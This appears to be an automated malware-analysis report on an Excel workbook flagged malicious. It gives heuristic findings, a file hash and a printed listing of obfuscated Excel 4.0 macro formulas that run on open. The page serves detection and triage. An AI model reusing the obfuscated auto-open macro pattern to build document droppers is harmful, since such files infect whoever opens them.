MALICIOUS
142
Risk Score
Heuristics 4
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6861 bytes |
SHA-256: c6645f91586f65bf70f7d55814f4bcf311810987650b7d176cc919b6ef9dd342 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
18 of 36 identifiers look randomly generated (e.g. 'bJDQdXVrOEeG') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - uTChJkpypm
' 0018 26 LABEL : Cell Value, String Constant - abCkXJaQlyw len=0
' 0018 20 LABEL : Cell Value, String Constant - aHEPZ len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!C183
' 0018 27 LABEL : Cell Value, String Constant - bJDQdXVrOEeG len=0
' 0018 23 LABEL : Cell Value, String Constant - CaBwHupX len=0
' 0018 23 LABEL : Cell Value, String Constant - CBfwSwfo len=0
' 0018 23 LABEL : Cell Value, String Constant - CkhFuzPr len=0
' 0018 23 LABEL : Cell Value, String Constant - dkOsKTcY len=0
' 0018 20 LABEL : Cell Value, String Constant - fRNGq len=0
' 0018 24 LABEL : Cell Value, String Constant - fzctLcpBC len=0
' 0018 23 LABEL : Cell Value, String Constant - JLSzfuJl len=0
' 0018 24 LABEL : Cell Value, String Constant - oPckrtPka len=0
' 0018 26 LABEL : Cell Value, String Constant - oWTotSrZDsh len=0
' 0018 21 LABEL : Cell Value, String Constant - PDlIgX len=0
' 0018 23 LABEL : Cell Value, String Constant - RLllweSB len=0
' 0018 24 LABEL : Cell Value, String Constant - SUDeLEDrz len=0
' 0018 23 LABEL : Cell Value, String Constant - TEXuQDPG len=0
' 0018 20 LABEL : Cell Value, String Constant - VlmgB len=0
' 0018 20 LABEL : Cell Value, String Constant - vMbdK len=0
' 0018 21 LABEL : Cell Value, String Constant - vWkzyM len=0
' 0018 23 LABEL : Cell Value, String Constant - ZNngvxOb len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' uTChJkpypm,S63,"",595.00000000000000000000
' uTChJkpypm,S64,"",428.00000000000000000000
' uTChJkpypm,S65,"",311.00000000000000000000
' uTChJkpypm,S66,"",-407.00000000000000000000
' uTChJkpypm,S67,"",-12.00000000000000000000
' uTChJkpypm,S68,"",-479.00000000000000000000
' uTChJkpypm,C90,"SET.NAME("abCkXJaQlyw",0+VALUE("0"))",""
' uTChJkpypm,C92,"SET.NAME("oPckrtPka",abCkXJaQlyw)",""
' uTChJkpypm,C94,"SET.NAME("CaBwHupX",abCkXJaQlyw)",""
' uTChJkpypm,C97,"SET.NAME("TEXuQDPG",COUNTA(vWkzyM))",""
' uTChJkpypm,C99,"SET.NAME("CkhFuzPr",COUNTA(vMbdK))",""
' uTChJkpypm,C101,[],""
' uTChJkpypm,C105,"SET.NAME("CBfwSwfo","")",""
' uTChJkpypm,C110,"oPckrtPka",""
' uTChJkpypm,C114,"SET.NAME("JLSzfuJl",HLOOKUP("*",vWkzyM,oPckrtPka,FALSE))",""
' uTChJkpypm,C119,"dkOsKTcY",""
' uTChJkpypm,C123,"SET.NAME("bJDQdXVrOEeG",abCkXJaQlyw)",""
' uTChJkpypm,C128,[],""
' uTChJkpypm,C133,"bJDQdXVrOEeG",""
' uTChJkpypm,C137,"oWTotSrZDsh",""
' uTChJkpypm,C140,"PDlIgX",""
' uTChJkpypm,C144,"RLllweSB",""
' uTChJkpypm,C146,"SET.NAME("aHEPZ",VALUE(HLOOKUP("*",vMbdK,RLllweSB,FALSE)))",""
' uTChJkpypm,C149,"SUDeLEDrz",""
' uTChJkpypm,C154,"CBfwSwfo",""
' uTChJkpypm,C156,"CaBwHupX",""
' uTChJkpypm,C161,NEXT(),""
' uTChJkpypm,C165,"ZNngvxOb",""
' uTChJkpypm,C170,[],""
' uTChJkpypm,C174,"VlmgB",""
' uTChJkpypm,C178,NEXT(),""
' uTChJkpypm,C180,RETURN(),""
' uTChJkpypm,C201,"SET.NAME("fzctLcpBC",C90)",""
' uTChJkpypm,C206,"vWkzyM",""
' uTChJkpypm,C211,"SET.NAME("vMbdK",R55C12)",""
' uTChJkpypm,C216,"SET.NAME("VlmgB",224)",""
' uTChJkpypm,C220,"SET.NAME("fRNGq",3)",""
' uTChJkpypm,C223,fzctLcpBC(),""
' uTChJkpypm,C224,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.